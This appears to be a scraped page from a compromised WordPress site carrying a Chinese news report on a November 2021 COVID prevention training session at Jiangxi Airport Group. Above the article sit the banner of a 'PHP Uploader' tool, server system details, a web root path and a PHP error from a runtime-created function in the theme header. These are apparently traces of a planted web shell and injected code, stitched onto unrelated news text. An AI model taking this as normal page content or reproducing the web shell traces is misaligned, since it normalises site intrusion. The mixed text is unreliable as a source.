PHP Uploader - By Phenix-TN & Mr.Anderson
Linux iZwz91hdhujjzqy9icuvwuZ 5.4.0-31-generic #35-Ubuntu SMP Thu May 7 20:20:34 UTC 2020 x86_64
okokok/www/wwwroot/aircn/new_wordpress/wordpressokokok
Warning: Use of undefined constant itongtong - assumed 'itongtong' (this will throw an Error in a future version of PHP) in /www/wwwroot/aircn/new_wordpress/wordpress/wp-content/themes/newsbulk/header.php(29) : runtime-created function on line 1

为贯彻落实民航局有关新冠疫情防控培训工作的部署和要求,2021年11月19日,江西机场集团疫情防控工作办公室采取“线上+线下”的方式开展了疫情防控策略和疫情处置培训,培训邀请到江西机场集团运控中心急救中心经理毛源泉进行授课。

培训主要对近期新冠疫情形势及防控策略、新冠肺炎聚集性疫情处置指南进行了详细讲解,其中疫情处置方面重点结合国务院联防联控机制印发的《新型冠状病毒肺炎防控方案(第八版)》,以及民航局《运输机场疫情防控技术指南(第八版)》、首都机场集团《新型冠状病毒肺炎疫情防控工作指导(7.1版)》和江西机场集团《新型冠状病毒感染的肺炎疫情防控工作操作细则(7.1版)》,对机场如发生旅客或员工感染新冠肺炎的应急处置措施再次进行了宣贯与解读。

培训有效推动了疫情防控工作人员更好的掌握防控政策和措施,提升常态化疫情防控和应急处置能力。培训要求,各单位要及时传达培训内容,确保各级人员深刻认识到疫情防控工作的紧迫性,准确把握疫情态势严重性和科学应对的复杂性,继续把疫情防控抓紧抓细抓实,为今冬明春的疫情防控工作做好万全准备,坚决筑牢疫情防控的坚固防线。

江西机场集团本部运保、机关相关单位等主要负责人和相关工作人员在主会场参加培训,各支线机场、井冈山培训基地及南昌机场驻场单位通过腾讯会议进行线上培训。

来源:中国民航网,通讯员:徐芳 报道

作者 一潼

发表回复